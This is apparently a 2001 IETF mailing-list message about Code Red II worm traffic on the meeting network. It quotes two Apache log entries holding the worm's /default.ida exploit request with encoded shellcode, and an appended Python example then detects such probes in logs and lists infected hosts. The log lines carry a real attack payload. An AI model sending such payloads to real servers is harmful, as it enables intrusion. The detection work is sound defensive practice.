--On 08/07/2001 9:21 AM -0400 Bobby Krupczak <[EMAIL PROTECTED]> wrote:
>> Well, folks, my packet suckers have shown a Code Red II attack from a
>> machine on the IETF meeting net. It's 217.33.140.38 -- if you have
>> that address, you need to disinfect and patch your machine. For the
>> rest of you, be careful...
>
> Do you always snoop on traffic at IETFs?
>
> Just curious. Don't read anything else into my question.

You don't have to snoop. Just run a webserver on port 80 on your local host
and look at the virus trying to attack your local laptop.
I run a local Apache, and the logs are full of things like these:
217.33.136.83 - - [07/Aug/2001:14:32:44 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
217.33.24.50 - - [07/Aug/2001:14:36:21 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
paf
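
Added example, not part of the original message: one way to pull these probes out of an Apache access log and list the source addresses behind them. It assumes common log format with one record per line (not wrapped as in the mail above); the function names, the sample addresses from the 192.0.2.0/24 documentation range and the shortened padding are constructed for illustration.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')
# /default.ida? + a long run of one padding letter + a train of %uXXXX escapes
PROBE_RE = re.compile(r'^/default\.ida\?(([A-Za-z])\2{63,})((?:%u[0-9a-fA-F]{4}){8,})')
# Padding letter per variant: the original Code Red padded with N, Code Red II with X
VARIANTS = {"N": "Code Red", "X": "Code Red II"}


def classify(line):
    """Return (source_ip, variant, status) for a worm probe, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    host, _method, target, status = m.groups()
    p = PROBE_RE.match(target)
    if not p:
        return None
    return host, VARIANTS.get(p.group(2), "unknown .ida probe"), int(status)


def summarize(lines):
    """Count probes per (source, variant); collect sources whose probe was not rejected."""
    hits, not_rejected = Counter(), set()
    for line in lines:
        result = classify(line)
        if result:
            host, variant, status = result
            hits[(host, variant)] += 1
            if status < 400:  # no 4xx/5xx: this server answered for default.ida
                not_rejected.add(host)
    return hits, not_rejected


ESCAPES = "%u9090%u6858%ucbd3%u7801" * 3  # shortened escape train, constructed


def _probe(ip, pad):  # constructed sample record; padding length is arbitrary
    return (f'{ip} - - [07/Aug/2001:14:32:44 +0100] "GET /default.ida?{pad * 224}'
            f'{ESCAPES} HTTP/1.0" 404 271')


SAMPLE = [_probe("192.0.2.10", "X"), _probe("192.0.2.10", "X"), _probe("192.0.2.77", "N"),
          '192.0.2.5 - - [07/Aug/2001:14:40:00 +0100] "GET /index.html HTTP/1.0" 200 1024']

if __name__ == "__main__":
    for (host, variant), n in summarize(SAMPLE)[0].items():
        print(f"{host}: {n} x {variant}")
```

A source address that shows up here is itself running the worm, so the output doubles as a list of machines that need disinfecting and patching.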